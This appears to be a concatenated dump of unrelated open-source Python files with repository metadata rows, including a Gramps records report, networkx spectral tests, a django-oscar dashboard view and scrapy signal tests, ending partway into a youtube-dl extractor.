for name, metric in [('precision', precision_score),
('recall', recall_score), ('f1', f1_score)]:
SCORERS[name] = make_scorer(metric)
for average in ['macro', 'micro', 'samples', 'weighted']:
qualified_name = '{0}_{1}'.format(name, average)
SCORERS[qualified_name] = make_scorer(partial(metric, pos_label=None,
average=average))
| bsd-3-clause | 8,861,626,613,151,488,000 | -2,435,399,175,317,932,500 | 35.706704 | 79 | 0.596454 | false |
ennoborg/gramps | gramps/plugins/textreport/recordsreport.py | 9 | 13718 | # encoding:utf-8
#
# Gramps - a GTK+/GNOME based genealogy program - Records plugin
#
# Copyright (C) 2008-2011 Reinhard Müller
# Copyright (C) 2010 Jakim Friant
# Copyright (C) 2012 Brian G. Matherly
# Copyright (C) 2013-2016 Paul Franklin
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
""" Records Report """
#------------------------------------------------------------------------
#
# Standard Python modules
#
#------------------------------------------------------------------------
#------------------------------------------------------------------------
#
# Gramps modules
#
#------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.sgettext
from gramps.plugins.lib.librecords import (RECORDS, find_records,
CALLNAME_DONTUSE, CALLNAME_REPLACE,
CALLNAME_UNDERLINE_ADD)
from gramps.gen.plug.docgen import (FontStyle, ParagraphStyle,
FONT_SANS_SERIF, PARA_ALIGN_CENTER,
IndexMark, INDEX_TYPE_TOC)
from gramps.gen.plug.menu import (BooleanOption, EnumeratedListOption,
FilterOption, NumberOption,
PersonOption, StringOption)
from gramps.gen.plug.report import Report
from gramps.gen.plug.report import utils
from gramps.gen.plug.report import MenuReportOptions
from gramps.gen.plug.report import stdoptions
from gramps.gen.lib import Span
from gramps.gen.errors import ReportError
from gramps.gen.proxy import LivingProxyDb, CacheProxyDb
#------------------------------------------------------------------------
#
# Records Report
#
#------------------------------------------------------------------------
class RecordsReport(Report):
""" Records Report """
def __init__(self, database, options, user):
"""
This report needs the following parameters (class variables)
that come in the options class.
incl_private - Whether to include private data
living_people - How to handle living people
years_past_death - Consider as living this many years after death
"""
Report.__init__(self, database, options, user)
menu = options.menu
self.set_locale(options.menu.get_option_by_name('trans').get_value())
stdoptions.run_private_data_option(self, menu)
living_opt = stdoptions.run_living_people_option(self, menu,
self._locale)
self.database = CacheProxyDb(self.database)
self._lv = menu.get_option_by_name('living_people').get_value()
for (value, description) in living_opt.get_items(xml_items=True):
if value == self._lv:
living_desc = self._(description)
break
self.living_desc = self._(
"(Living people: %(option_name)s)") % {'option_name': living_desc}
filter_option = menu.get_option_by_name('filter')
self.filter = filter_option.get_filter()
self.top_size = menu.get_option_by_name('top_size').get_value()
self.callname = menu.get_option_by_name('callname').get_value()
self.footer = menu.get_option_by_name('footer').get_value()
self.include = {}
for (text, varname, default) in RECORDS:
self.include[varname] = menu.get_option_by_name(varname).get_value()
self._nf = stdoptions.run_name_format_option(self, menu)
def write_report(self):
"""
Build the actual report.
"""
records = find_records(self.database, self.filter,
self.top_size, self.callname,
trans_text=self._, name_format=self._nf,
living_mode=self._lv, user=self._user)
self.doc.start_paragraph('REC-Title')
title = self._("Records")
mark = IndexMark(title, INDEX_TYPE_TOC, 1)
self.doc.write_text(title, mark)
self.doc.end_paragraph()
self.doc.start_paragraph('REC-Subtitle')
filter_name = self.filter.get_name(self._locale)
self.doc.write_text("(%s)" % filter_name)
self.doc.end_paragraph()
if self._lv != LivingProxyDb.MODE_INCLUDE_ALL:
self.doc.start_paragraph('REC-Subtitle')
self.doc.write_text(self.living_desc)
self.doc.end_paragraph()
for (text, varname, top) in records:
if not self.include[varname]:
continue
self.doc.start_paragraph('REC-Heading')
self.doc.write_text(self._(text))
self.doc.end_paragraph()
last_value = None
rank = 0
for (number,
(sort, value, name, handletype, handle)) in enumerate(top):
mark = None
if handletype == 'Person':
person = self.database.get_person_from_handle(handle)
mark = utils.get_person_mark(self.database, person)
elif handletype == 'Family':
family = self.database.get_family_from_handle(handle)
# librecords.py checks that the family has both
# a father and a mother and also that each one is
# in the filter if any filter was used, so we don't
# have to do any similar checking here, it's been done
f_handle = family.get_father_handle()
dad = self.database.get_person_from_handle(f_handle)
f_mark = utils.get_person_mark(self.database, dad)
m_handle = family.get_mother_handle()
mom = self.database.get_person_from_handle(m_handle)
m_mark = utils.get_person_mark(self.database, mom)
else:
raise ReportError(_(
"Option '%(opt_name)s' is present "
"in %(file)s\n but is not known to "
"the module. Ignoring...")
% {'opt_name': handletype,
'file': 'libnarrate.py'})
# since the error is very unlikely I reused the string
if value != last_value:
last_value = value
rank = number
self.doc.start_paragraph('REC-Normal')
self.doc.write_text(
self._("%(number)s. ") % {'number': rank+1})
self.doc.write_markup(str(name), name.get_tags(), mark)
if handletype == 'Family':
self.doc.write_text('', f_mark)
self.doc.write_text('', m_mark)
if isinstance(value, Span):
tvalue = value.get_repr(dlocale=self._locale)
else:
tvalue = value
self.doc.write_text(" (%s)" % tvalue)
self.doc.end_paragraph()
self.doc.start_paragraph('REC-Footer')
self.doc.write_text(self.footer)
self.doc.end_paragraph()
#------------------------------------------------------------------------
#
# Records Report Options
#
#------------------------------------------------------------------------
class RecordsReportOptions(MenuReportOptions):
"""
Defines options and provides handling interface.
"""
def __init__(self, name, dbase):
self.__pid = None
self.__filter = None
self.__db = dbase
self._nf = None
MenuReportOptions.__init__(self, name, dbase)
def get_subject(self):
""" Return a string that describes the subject of the report. """
return self.__filter.get_filter().get_name()
def add_menu_options(self, menu):
category_name = _("Report Options")
self.__filter = FilterOption(_("Filter"), 0)
self.__filter.set_help(
_("Determines what people are included in the report."))
menu.add_option(category_name, "filter", self.__filter)
self.__filter.connect('value-changed', self.__filter_changed)
self.__pid = PersonOption(_("Filter Person"))
self.__pid.set_help(_("The center person for the filter"))
menu.add_option(category_name, "pid", self.__pid)
self.__pid.connect('value-changed', self.__update_filters)
top_size = NumberOption(_("Number of ranks to display"), 3, 1, 100)
menu.add_option(category_name, "top_size", top_size)
callname = EnumeratedListOption(_("Use call name"), CALLNAME_DONTUSE)
callname.set_items([
(CALLNAME_DONTUSE, _("Don't use call name")),
(CALLNAME_REPLACE, _("Replace first names with call name")),
(CALLNAME_UNDERLINE_ADD,
_("Underline call name in first names / "
"add call name to first name"))])
menu.add_option(category_name, "callname", callname)
footer = StringOption(_("Footer text"), "")
menu.add_option(category_name, "footer", footer)
category_name = _("Report Options (2)")
self._nf = stdoptions.add_name_format_option(menu, category_name)
self._nf.connect('value-changed', self.__update_filters)
self.__update_filters()
stdoptions.add_private_data_option(menu, category_name)
stdoptions.add_living_people_option(menu, category_name)
stdoptions.add_localization_option(menu, category_name)
p_count = 0
for (text, varname, default) in RECORDS:
if varname.startswith('person'):
p_count += 1
p_half = p_count // 2
p_idx = 0
for (text, varname, default) in RECORDS:
option = BooleanOption(_(text), default)
if varname.startswith('person'):
if p_idx >= p_half:
category_name = _("Person 2")
else:
category_name = _("Person 1")
p_idx += 1
elif varname.startswith('family'):
category_name = _("Family")
menu.add_option(category_name, varname, option)
def __update_filters(self):
"""
Update the filter list based on the selected person
"""
gid = self.__pid.get_value()
person = self.__db.get_person_from_gramps_id(gid)
nfv = self._nf.get_value()
filter_list = utils.get_person_filters(person,
include_single=False,
name_format=nfv)
self.__filter.set_filters(filter_list)
def __filter_changed(self):
"""
Handle filter change. If the filter is not specific to a person,
disable the person option
"""
filter_value = self.__filter.get_value()
if filter_value == 0: # "Entire Database" (as "include_single=False")
self.__pid.set_available(False)
else:
# The other filters need a center person (assume custom ones too)
self.__pid.set_available(True)
def make_default_style(self, default_style):
#Paragraph Styles
font = FontStyle()
font.set_type_face(FONT_SANS_SERIF)
font.set_size(16)
font.set_bold(True)
para = ParagraphStyle()
para.set_font(font)
para.set_alignment(PARA_ALIGN_CENTER)
para.set_description(_("The style used for the title."))
default_style.add_paragraph_style('REC-Title', para)
font = FontStyle()
font.set_type_face(FONT_SANS_SERIF)
font.set_size(12)
font.set_bold(True)
para = ParagraphStyle()
para.set_font(font)
para.set_alignment(PARA_ALIGN_CENTER)
para.set_description(_("The style used for the subtitle."))
default_style.add_paragraph_style('REC-Subtitle', para)
font = FontStyle()
font.set_size(12)
font.set_bold(True)
para = ParagraphStyle()
para.set_font(font)
para.set_top_margin(utils.pt2cm(6))
para.set_description(_('The style used for the section headers.'))
default_style.add_paragraph_style('REC-Heading', para)
font = FontStyle()
font.set_size(10)
para = ParagraphStyle()
para.set_font(font)
para.set_left_margin(0.5)
para.set_description(_('The basic style used for the text display.'))
default_style.add_paragraph_style('REC-Normal', para)
font = FontStyle()
font.set_size(8)
para = ParagraphStyle()
para.set_font(font)
para.set_alignment(PARA_ALIGN_CENTER)
para.set_top_border(True)
para.set_top_margin(utils.pt2cm(8))
para.set_description(_('The style used for the footer.'))
default_style.add_paragraph_style('REC-Footer', para)
| gpl-2.0 | 518,318,817,104,506,700 | -3,785,294,314,351,827,500 | 38.644509 | 80 | 0.547933 | false |
axiom-data-science/paegan | paegan/cdm/dsg/collections/base/nested_point_collection.py | 3 | 1754 | import itertools
import collections
from paegan.cdm.dsg.collections.base.feature_collection import FeatureCollection
from paegan.cdm.dsg.collections.base.point_collection import PointCollection
from paegan.cdm.dsg.features.base.point import Point
from paegan.utils.asalist import AsaList
class NestedPointCollection(FeatureCollection):
"""
A collection of PointCollections
"""
def __init__(self, **kwargs):
super(NestedPointCollection,self).__init__(**kwargs)
def calculate_bounds(self):
"""
Calculate the time_range, bbox, and size of this collection.
Will scan all data.
Ensures that .size, .bbox and .time_range return non-null.
If the collection already knows its bbox; time_range; and/or size,
they are recomputed.
"""
single_point_collection = PointCollection(elements=list(AsaList.flatten(self)))
single_point_collection.calculate_bounds()
self.bbox = single_point_collection.bbox
self.time_range = single_point_collection.time_range
self.depth_range = single_point_collection.depth_range
self._point_size = single_point_collection.size
self.size = len(self._elements)
def flatten(self):
"""
Returns a Generator of Points that are part of this collection
"""
return AsaList.flatten(self)
def get_point_size(self):
"""
Returns the number of actual Points in this NestedPointCollection
Ex. pc = 10 profiles with 20 bins each will return 200
pc.size = 10
pc.point_size = 200
"""
return self._point_size
point_size = property(get_point_size, None) | gpl-3.0 | -6,216,497,609,527,559,000 | -9,073,078,131,527,198,000 | 34.1 | 87 | 0.650513 | false |
chrisnatali/networkx | networkx/linalg/tests/test_algebraic_connectivity.py | 54 | 10790 | from contextlib import contextmanager
from math import sqrt
import networkx as nx
from nose import SkipTest
from nose.tools import *
methods = ('tracemin_pcg', 'tracemin_chol', 'tracemin_lu', 'lanczos', 'lobpcg')
try:
from numpy.random import get_state, seed, set_state, shuffle
@contextmanager
def save_random_state():
state = get_state()
try:
yield
finally:
set_state(state)
def preserve_random_state(func):
def wrapper(*args, **kwargs):
with save_random_state():
seed(1234567890)
return func(*args, **kwargs)
wrapper.__name__ = func.__name__
return wrapper
except ImportError:
@contextmanager
def save_random_state():
yield
def preserve_random_state(func):
return func
def check_eigenvector(A, l, x):
nx = numpy.linalg.norm(x)
# Check zeroness.
assert_not_almost_equal(nx, 0)
y = A * x
ny = numpy.linalg.norm(y)
# Check collinearity.
assert_almost_equal(numpy.dot(x, y), nx * ny)
# Check eigenvalue.
assert_almost_equal(ny, l * nx)
class TestAlgebraicConnectivity(object):
numpy = 1
@classmethod
def setupClass(cls):
global numpy
try:
import numpy.linalg
import scipy.sparse
except ImportError:
raise SkipTest('SciPy not available.')
@preserve_random_state
def test_directed(self):
G = nx.DiGraph()
for method in self._methods:
assert_raises(nx.NetworkXNotImplemented, nx.algebraic_connectivity,
G, method=method)
assert_raises(nx.NetworkXNotImplemented, nx.fiedler_vector, G,
method=method)
@preserve_random_state
def test_null_and_singleton(self):
G = nx.Graph()
for method in self._methods:
assert_raises(nx.NetworkXError, nx.algebraic_connectivity, G,
method=method)
assert_raises(nx.NetworkXError, nx.fiedler_vector, G,
method=method)
G.add_edge(0, 0)
for method in self._methods:
assert_raises(nx.NetworkXError, nx.algebraic_connectivity, G,
method=method)
assert_raises(nx.NetworkXError, nx.fiedler_vector, G,
method=method)
@preserve_random_state
def test_disconnected(self):
G = nx.Graph()
G.add_nodes_from(range(2))
for method in self._methods:
assert_equal(nx.algebraic_connectivity(G), 0)
assert_raises(nx.NetworkXError, nx.fiedler_vector, G,
method=method)
G.add_edge(0, 1, weight=0)
for method in self._methods:
assert_equal(nx.algebraic_connectivity(G), 0)
assert_raises(nx.NetworkXError, nx.fiedler_vector, G,
method=method)
@preserve_random_state
def test_unrecognized_method(self):
G = nx.path_graph(4)
assert_raises(nx.NetworkXError, nx.algebraic_connectivity, G,
method='unknown')
assert_raises(nx.NetworkXError, nx.fiedler_vector, G, method='unknown')
@preserve_random_state
def test_two_nodes(self):
G = nx.Graph()
G.add_edge(0, 1, weight=1)
A = nx.laplacian_matrix(G)
for method in self._methods:
assert_almost_equal(nx.algebraic_connectivity(
G, tol=1e-12, method=method), 2)
x = nx.fiedler_vector(G, tol=1e-12, method=method)
check_eigenvector(A, 2, x)
G = nx.MultiGraph()
G.add_edge(0, 0, spam=1e8)
G.add_edge(0, 1, spam=1)
G.add_edge(0, 1, spam=-2)
A = -3 * nx.laplacian_matrix(G, weight='spam')
for method in self._methods:
assert_almost_equal(nx.algebraic_connectivity(
G, weight='spam', tol=1e-12, method=method), 6)
x = nx.fiedler_vector(G, weight='spam', tol=1e-12, method=method)
check_eigenvector(A, 6, x)
@preserve_random_state
def test_path(self):
G = nx.path_graph(8)
A = nx.laplacian_matrix(G)
sigma = 2 - sqrt(2 + sqrt(2))
for method in self._methods:
assert_almost_equal(nx.algebraic_connectivity(
G, tol=1e-12, method=method), sigma)
x = nx.fiedler_vector(G, tol=1e-12, method=method)
check_eigenvector(A, sigma, x)
@preserve_random_state
def test_cycle(self):
G = nx.cycle_graph(8)
A = nx.laplacian_matrix(G)
sigma = 2 - sqrt(2)
for method in self._methods:
assert_almost_equal(nx.algebraic_connectivity(
G, tol=1e-12, method=method), sigma)
x = nx.fiedler_vector(G, tol=1e-12, method=method)
check_eigenvector(A, sigma, x)
@preserve_random_state
def test_buckminsterfullerene(self):
G = nx.Graph(
[(1, 10), (1, 41), (1, 59), (2, 12), (2, 42), (2, 60), (3, 6),
(3, 43), (3, 57), (4, 8), (4, 44), (4, 58), (5, 13), (5, 56),
(5, 57), (6, 10), (6, 31), (7, 14), (7, 56), (7, 58), (8, 12),
(8, 32), (9, 23), (9, 53), (9, 59), (10, 15), (11, 24), (11, 53),
(11, 60), (12, 16), (13, 14), (13, 25), (14, 26), (15, 27),
(15, 49), (16, 28), (16, 50), (17, 18), (17, 19), (17, 54),
(18, 20), (18, 55), (19, 23), (19, 41), (20, 24), (20, 42),
(21, 31), (21, 33), (21, 57), (22, 32), (22, 34), (22, 58),
(23, 24), (25, 35), (25, 43), (26, 36), (26, 44), (27, 51),
(27, 59), (28, 52), (28, 60), (29, 33), (29, 34), (29, 56),
(30, 51), (30, 52), (30, 53), (31, 47), (32, 48), (33, 45),
(34, 46), (35, 36), (35, 37), (36, 38), (37, 39), (37, 49),
(38, 40), (38, 50), (39, 40), (39, 51), (40, 52), (41, 47),
(42, 48), (43, 49), (44, 50), (45, 46), (45, 54), (46, 55),
(47, 54), (48, 55)])
for normalized in (False, True):
if not normalized:
A = nx.laplacian_matrix(G)
sigma = 0.2434017461399311
else:
A = nx.normalized_laplacian_matrix(G)
sigma = 0.08113391537997749
for method in methods:
try:
assert_almost_equal(nx.algebraic_connectivity(
G, normalized=normalized, tol=1e-12, method=method),
sigma)
x = nx.fiedler_vector(G, normalized=normalized, tol=1e-12,
method=method)
check_eigenvector(A, sigma, x)
except nx.NetworkXError as e:
if e.args not in (('Cholesky solver unavailable.',),
('LU solver unavailable.',)):
raise
_methods = ('tracemin', 'lanczos', 'lobpcg')
class TestSpectralOrdering(object):
numpy = 1
@classmethod
def setupClass(cls):
global numpy
try:
import numpy.linalg
import scipy.sparse
except ImportError:
raise SkipTest('SciPy not available.')
@preserve_random_state
def test_nullgraph(self):
for graph in (nx.Graph, nx.DiGraph, nx.MultiGraph, nx.MultiDiGraph):
G = graph()
assert_raises(nx.NetworkXError, nx.spectral_ordering, G)
@preserve_random_state
def test_singleton(self):
for graph in (nx.Graph, nx.DiGraph, nx.MultiGraph, nx.MultiDiGraph):
G = graph()
G.add_node('x')
assert_equal(nx.spectral_ordering(G), ['x'])
G.add_edge('x', 'x', weight=33)
G.add_edge('x', 'x', weight=33)
assert_equal(nx.spectral_ordering(G), ['x'])
@preserve_random_state
def test_unrecognized_method(self):
G = nx.path_graph(4)
assert_raises(nx.NetworkXError, nx.spectral_ordering, G,
method='unknown')
@preserve_random_state
def test_three_nodes(self):
G = nx.Graph()
G.add_weighted_edges_from([(1, 2, 1), (1, 3, 2), (2, 3, 1)],
weight='spam')
for method in self._methods:
order = nx.spectral_ordering(G, weight='spam', method=method)
assert_equal(set(order), set(G))
ok_(set([1, 3]) in (set(order[:-1]), set(order[1:])))
G = nx.MultiDiGraph()
G.add_weighted_edges_from([(1, 2, 1), (1, 3, 2), (2, 3, 1), (2, 3, 2)])
for method in self._methods:
order = nx.spectral_ordering(G, method=method)
assert_equal(set(order), set(G))
ok_(set([2, 3]) in (set(order[:-1]), set(order[1:])))
@preserve_random_state
def test_path(self):
path = list(range(10))
shuffle(path)
G = nx.Graph()
G.add_path(path)
for method in self._methods:
order = nx.spectral_ordering(G, method=method)
ok_(order in [path, list(reversed(path))])
@preserve_random_state
def test_disconnected(self):
G = nx.Graph()
G.add_path(range(0, 10, 2))
G.add_path(range(1, 10, 2))
for method in self._methods:
order = nx.spectral_ordering(G, method=method)
assert_equal(set(order), set(G))
seqs = [list(range(0, 10, 2)), list(range(8, -1, -2)),
list(range(1, 10, 2)), list(range(9, -1, -2))]
ok_(order[:5] in seqs)
ok_(order[5:] in seqs)
@preserve_random_state
def test_cycle(self):
path = list(range(10))
G = nx.Graph()
G.add_path(path, weight=5)
G.add_edge(path[-1], path[0], weight=1)
A = nx.laplacian_matrix(G).todense()
for normalized in (False, True):
for method in methods:
try:
order = nx.spectral_ordering(G, normalized=normalized,
method=method)
except nx.NetworkXError as e:
if e.args not in (('Cholesky solver unavailable.',),
('LU solver unavailable.',)):
raise
else:
if not normalized:
ok_(order in [[1, 2, 0, 3, 4, 5, 6, 9, 7, 8],
[8, 7, 9, 6, 5, 4, 3, 0, 2, 1]])
else:
ok_(order in [[1, 2, 3, 0, 4, 5, 9, 6, 7, 8],
[8, 7, 6, 9, 5, 4, 0, 3, 2, 1]])
_methods = ('tracemin', 'lanczos', 'lobpcg')
| bsd-3-clause | 7,188,892,658,606,244,000 | 8,199,519,774,208,463,000 | 36.465278 | 79 | 0.506858 | false |
nfletton/django-oscar | src/oscar/apps/dashboard/views.py | 32 | 7437 | from datetime import timedelta
from decimal import Decimal as D, ROUND_UP
from django.utils.timezone import now
from django.views.generic import TemplateView
from oscar.core.loading import get_model
from django.db.models import Avg, Sum, Count
from oscar.core.compat import get_user_model
from oscar.apps.promotions.models import AbstractPromotion
ConditionalOffer = get_model('offer', 'ConditionalOffer')
Voucher = get_model('voucher', 'Voucher')
Basket = get_model('basket', 'Basket')
StockAlert = get_model('partner', 'StockAlert')
Product = get_model('catalogue', 'Product')
Order = get_model('order', 'Order')
Line = get_model('order', 'Line')
User = get_user_model()
class IndexView(TemplateView):
"""
An overview view which displays several reports about the shop.
    Supports the permission-based dashboard. It is recommended to add an
    index_nonstaff.html template because Oscar's default template will
display potentially sensitive store information.
"""
def get_template_names(self):
if self.request.user.is_staff:
return ['dashboard/index.html', ]
else:
return ['dashboard/index_nonstaff.html', 'dashboard/index.html']
def get_context_data(self, **kwargs):
ctx = super(IndexView, self).get_context_data(**kwargs)
ctx.update(self.get_stats())
return ctx
def get_active_site_offers(self):
"""
Return active conditional offers of type "site offer". The returned
        ``Queryset`` of site offers is filtered by end date greater than
the current date.
"""
return ConditionalOffer.objects.filter(
end_datetime__gt=now(), offer_type=ConditionalOffer.SITE)
def get_active_vouchers(self):
"""
Get all active vouchers. The returned ``Queryset`` of vouchers
        is filtered by end date greater than the current date.
"""
return Voucher.objects.filter(end_datetime__gt=now())
def get_number_of_promotions(self, abstract_base=AbstractPromotion):
"""
Get the number of promotions for all promotions derived from
*abstract_base*. All subclasses of *abstract_base* are queried
and if another abstract base class is found this method is executed
recursively.
"""
total = 0
for cls in abstract_base.__subclasses__():
if cls._meta.abstract:
total += self.get_number_of_promotions(cls)
else:
total += cls.objects.count()
return total
def get_open_baskets(self, filters=None):
"""
        Get all open baskets. If a *filters* dictionary is provided, it is
        applied to the open baskets and only the filtered results are returned.
"""
if filters is None:
filters = {}
filters['status'] = Basket.OPEN
return Basket.objects.filter(**filters)
def get_hourly_report(self, hours=24, segments=10):
"""
Get report of order revenue split up in hourly chunks. A report is
generated for the last *hours* (default=24) from the current time.
The report provides ``max_revenue`` of the hourly order revenue sum,
``y-range`` as the labeling for the y-axis in a template and
``order_total_hourly``, a list of properties for hourly chunks.
*segments* defines the number of labeling segments used for the y-axis
when generating the y-axis labels (default=10).
"""
        # Get datetime for 24 hours ago
time_now = now().replace(minute=0, second=0)
start_time = time_now - timedelta(hours=hours - 1)
orders_last_day = Order.objects.filter(date_placed__gt=start_time)
order_total_hourly = []
for hour in range(0, hours, 2):
end_time = start_time + timedelta(hours=2)
hourly_orders = orders_last_day.filter(date_placed__gt=start_time,
date_placed__lt=end_time)
total = hourly_orders.aggregate(
Sum('total_incl_tax')
)['total_incl_tax__sum'] or D('0.0')
order_total_hourly.append({
'end_time': end_time,
'total_incl_tax': total
})
start_time = end_time
max_value = max([x['total_incl_tax'] for x in order_total_hourly])
divisor = 1
while divisor < max_value / 50:
divisor *= 10
max_value = (max_value / divisor).quantize(D('1'), rounding=ROUND_UP)
max_value *= divisor
if max_value:
segment_size = (max_value) / D('100.0')
for item in order_total_hourly:
item['percentage'] = int(item['total_incl_tax'] / segment_size)
y_range = []
y_axis_steps = max_value / D(str(segments))
for idx in reversed(range(segments + 1)):
y_range.append(idx * y_axis_steps)
else:
y_range = []
for item in order_total_hourly:
item['percentage'] = 0
ctx = {
'order_total_hourly': order_total_hourly,
'max_revenue': max_value,
'y_range': y_range,
}
return ctx
def get_stats(self):
datetime_24hrs_ago = now() - timedelta(hours=24)
orders = Order.objects.filter()
orders_last_day = orders.filter(date_placed__gt=datetime_24hrs_ago)
open_alerts = StockAlert.objects.filter(status=StockAlert.OPEN)
closed_alerts = StockAlert.objects.filter(status=StockAlert.CLOSED)
total_lines_last_day = Line.objects.filter(
order__in=orders_last_day).count()
stats = {
'total_orders_last_day': orders_last_day.count(),
'total_lines_last_day': total_lines_last_day,
'average_order_costs': orders_last_day.aggregate(
Avg('total_incl_tax')
)['total_incl_tax__avg'] or D('0.00'),
'total_revenue_last_day': orders_last_day.aggregate(
Sum('total_incl_tax')
)['total_incl_tax__sum'] or D('0.00'),
'hourly_report_dict': self.get_hourly_report(hours=24),
'total_customers_last_day': User.objects.filter(
date_joined__gt=datetime_24hrs_ago,
).count(),
'total_open_baskets_last_day': self.get_open_baskets({
'date_created__gt': datetime_24hrs_ago
}).count(),
'total_products': Product.objects.count(),
'total_open_stock_alerts': open_alerts.count(),
'total_closed_stock_alerts': closed_alerts.count(),
'total_site_offers': self.get_active_site_offers().count(),
'total_vouchers': self.get_active_vouchers().count(),
'total_promotions': self.get_number_of_promotions(),
'total_customers': User.objects.count(),
'total_open_baskets': self.get_open_baskets().count(),
'total_orders': orders.count(),
'total_lines': Line.objects.filter(order__in=orders).count(),
'total_revenue': orders.aggregate(
Sum('total_incl_tax')
)['total_incl_tax__sum'] or D('0.00'),
'order_status_breakdown': orders.order_by(
'status'
).values('status').annotate(freq=Count('id'))
}
return stats
| bsd-3-clause | -8,092,620,302,921,056,000 | -2,825,389,838,340,537,300 | 37.734375 | 79 | 0.591636 | false |
iitjee/steppinsPython | SystemProgramming/Parallel System/00 intro.py | 1 | 2190 | Most computers spend a lot of time doing nothing. If you start a system monitor tool and watch the CPU utilization, you’ll see
what I mean—it’s rare to see one hit 100 percent, even when you are running multiple programs.* There are just too many delays
built into software: disk accesses, network traffic, database queries, waiting for users to click a button, and so on. In
fact, the majority of a modern CPU’s capacity is often spent in an idle state; faster chips help speed up performance demand
peaks, but much of their power can go largely unused.
Early on in computing, programmers realized that they could tap into such unused processing power by running more than one
program at the same time. By dividing the CPU’s attention among a set of tasks, its capacity need not go to waste while any
given task is waiting for an external event to occur. The technique is usually called parallel processing (and sometimes
“multiprocessing” or even “multitasking”) because many tasks seem to be performed at once, overlapping and parallel in time.
It’s at the heart of modern operating systems, and it gave rise to the notion of multiple-active-window computer interfaces
we’ve all come to take for granted.
There are two fundamental ways to get tasks running at the same time in Python—process forks and spawned threads.
Functionally, both rely on underlying operating system services to run bits of Python code in parallel. Procedurally, they are
very different in terms of interface, portability, and communication.
For example, direct process forks are not supported on Windows under standard Python, whereas Python's thread support works on all
major platforms.
The focus in this chapter is on introducing more direct techniques—forks, threads, pipes, signals, sockets, and other launching
techniques—and on using Python's built-in tools that support them, such as the os.fork call and the threading, queue, and
multiprocessing modules.
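As a rough illustration of the two approaches, here is a minimal sketch (not one of the chapter's own examples) that runs one task in a spawned thread and one in a forked child process; the fork branch assumes a Unix-like platform where os.fork exists:

import os, threading, time

def count(label, n=3):
    # The "work": print a few times with a short delay so the overlap is visible.
    for i in range(n):
        print(label, i)
        time.sleep(0.1)

# Spawned thread: runs count() in parallel within this same process.
t = threading.Thread(target=count, args=('thread',))
t.start()

# Forked process: only attempted where fork is supported (not standard Windows).
if hasattr(os, 'fork'):
    pid = os.fork()
    if pid == 0:                 # child process
        count('forked child')
        os._exit(0)              # leave the child without running the rest of the script
    os.waitpid(pid, 0)           # parent waits for the child to finish

t.join()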
External Tools (3rd Party):
The MPI for Python system allows Python scripts to also employ the Message Passing Interface (MPI) standard, allowing Python
programs to exploit multiple processors in various ways.
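A correspondingly small sketch of that third-party route (assuming the mpi4py package is installed and the script is started under an MPI launcher, e.g. mpiexec -n 2 python script.py):

from mpi4py import MPI

comm = MPI.COMM_WORLD
rank = comm.Get_rank()      # this process's id within the MPI job
size = comm.Get_size()      # total number of MPI processes

if rank == 0:
    comm.send('hello from rank 0', dest=1)   # lowercase send/recv handle Python objects
elif rank == 1:
    msg = comm.recv(source=0)
    print('rank 1 of', size, 'received:', msg)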
| gpl-3.0 | 4,764,080,521,360,545,000 | -6,905,916,995,257,661,000 | 76.071429 | 127 | 0.796571 | false |
jc0n/scrapy | tests/test_utils_signal.py | 121 | 2741 | from testfixtures import LogCapture
from twisted.trial import unittest
from twisted.python.failure import Failure
from twisted.internet import defer, reactor
from pydispatch import dispatcher
from scrapy.utils.signal import send_catch_log, send_catch_log_deferred
class SendCatchLogTest(unittest.TestCase):
@defer.inlineCallbacks
def test_send_catch_log(self):
test_signal = object()
handlers_called = set()
dispatcher.connect(self.error_handler, signal=test_signal)
dispatcher.connect(self.ok_handler, signal=test_signal)
with LogCapture() as l:
result = yield defer.maybeDeferred(
self._get_result, test_signal, arg='test',
handlers_called=handlers_called
)
assert self.error_handler in handlers_called
assert self.ok_handler in handlers_called
self.assertEqual(len(l.records), 1)
record = l.records[0]
self.assertIn('error_handler', record.getMessage())
self.assertEqual(record.levelname, 'ERROR')
self.assertEqual(result[0][0], self.error_handler)
self.assert_(isinstance(result[0][1], Failure))
self.assertEqual(result[1], (self.ok_handler, "OK"))
dispatcher.disconnect(self.error_handler, signal=test_signal)
dispatcher.disconnect(self.ok_handler, signal=test_signal)
def _get_result(self, signal, *a, **kw):
return send_catch_log(signal, *a, **kw)
def error_handler(self, arg, handlers_called):
handlers_called.add(self.error_handler)
a = 1/0
def ok_handler(self, arg, handlers_called):
handlers_called.add(self.ok_handler)
assert arg == 'test'
return "OK"
class SendCatchLogDeferredTest(SendCatchLogTest):
def _get_result(self, signal, *a, **kw):
return send_catch_log_deferred(signal, *a, **kw)
class SendCatchLogDeferredTest2(SendCatchLogTest):
def ok_handler(self, arg, handlers_called):
handlers_called.add(self.ok_handler)
assert arg == 'test'
d = defer.Deferred()
reactor.callLater(0, d.callback, "OK")
return d
def _get_result(self, signal, *a, **kw):
return send_catch_log_deferred(signal, *a, **kw)
class SendCatchLogTest2(unittest.TestCase):
def test_error_logged_if_deferred_not_supported(self):
test_signal = object()
test_handler = lambda: defer.Deferred()
dispatcher.connect(test_handler, test_signal)
with LogCapture() as l:
send_catch_log(test_signal)
self.assertEqual(len(l.records), 1)
self.assertIn("Cannot return deferreds from signal handler", str(l))
dispatcher.disconnect(test_handler, test_signal)
| bsd-3-clause | 1,809,620,048,862,520,000 | 55,341,456,848,792,870 | 33.696203 | 76 | 0.660343 | false |
Dino0631/RedRain-Bot | cogs/lib/youtube_dl/extractor/orf.py | 17 | 10860 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..compat import compat_str
from ..utils import (
HEADRequest,
unified_strdate,
strip_jsonp,
int_or_none,
float_or_none,
determine_ext,
remove_end,
unescapeHTML,
)
class ORFTVthekIE(InfoExtractor):
IE_NAME = 'orf:tvthek'
IE_DESC = 'ORF TVthek'
_VALID_URL = r'https?://tvthek\.orf\.at/(?:[^/]+/)+(?P<id>\d+)'
_TESTS = [{
